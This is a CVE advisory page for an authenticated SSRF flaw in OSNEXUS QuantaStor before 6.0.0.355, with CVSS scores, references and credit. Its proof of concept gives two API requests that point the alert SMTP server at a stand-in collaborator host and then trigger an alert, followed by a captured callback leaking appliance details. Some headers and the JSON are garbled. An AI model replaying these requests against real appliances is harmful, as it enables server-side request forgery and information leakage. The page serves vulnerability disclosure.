SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
CVE-2021-42079

6.2MEDIUM

Key Information:

Vendor

Osnexus

Status
Quantastor
Vendor
CVE Published:
10 July 2023

What is CVE-2021-42079?

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http:// HTTP/1.1

Host: Accept-Encoding: gzip, deflate

Accept: / Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json

Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1

Host: Accept-Encoding: gzip, deflate

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json

Content-Length: 1

The post request received by looks like this: {  

Python FLASK stuff

 'endpoint': 'index',   'method': 'POST',   'cookies': ImmutableMultiDict([]),  

END Python FLASK stuff

  'data': b'{   "attachments": [    {

    "fallback": "[122] test / test.",

    "color": "#aa2222",

    "title": "[122] test",

    "text": "test",

    "fields": [ Β       { Β  Β 

      "title": "Alert Severity", Β  Β        "value": "CRITICAL", Β  Β        "short": false Β       }, Β { Β        "title": "Appliance", Β  Β        "value": "quantastor (https://)", Β  Β        "short": true Β 

     }, Β { Β  Β 

      "title": "System / Driver / Kernel Ver", Β  Β 

      "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", Β  Β 

      "short": false Β 

     }, Β { Β  Β 

      "title": "System Startup", Β  Β 

      "value": "Fri Aug Β 6 16-02-55 2021", Β  Β 

      "short": true Β 

      }, Β { Β  Β 

      "title": "SSID", Β  Β 

      "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", Β  Β 

      "short": true Β 

     },     ],

    "footer": "QuantaStor Call-home Alert",

    "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",

    "ts": 1628461774    }   ],   "mrkdwn":true  }',  #### FLASK REQUEST STUFF #####

 'headers': {

  'Host': '',   'User-Agent': 'curl/7.58.0',   'Accept': '/',   'Content-Type': 'application/json',   'Content-Length': '790'

 },  'args': ImmutableMultiDict([]),  'form': ImmutableMultiDict([]),  'remote_addr': '217.103.63.173',  'path': '/payload/58',  'whois_ip': 'TNF-AS, NL' }

END FLASK REQUEST STUFF

Affected Version(s)

QuantaStor Windows 0 < 6.0.0.355

References

https://www.wbsec.nl/osnexus
third-party-advisorytechnical-description
https://cisrt.divd.nl/DIVD-2021-00020/
third-party-advisoryexploittechnical-description
https://www.osnexus.com/products/software-defined-storage
product

CVSS V3.1

Score:
6.2
Severity:
MEDIUM
Confidentiality:
High
Integrity:
None
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
High
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Wietse Boonstra
.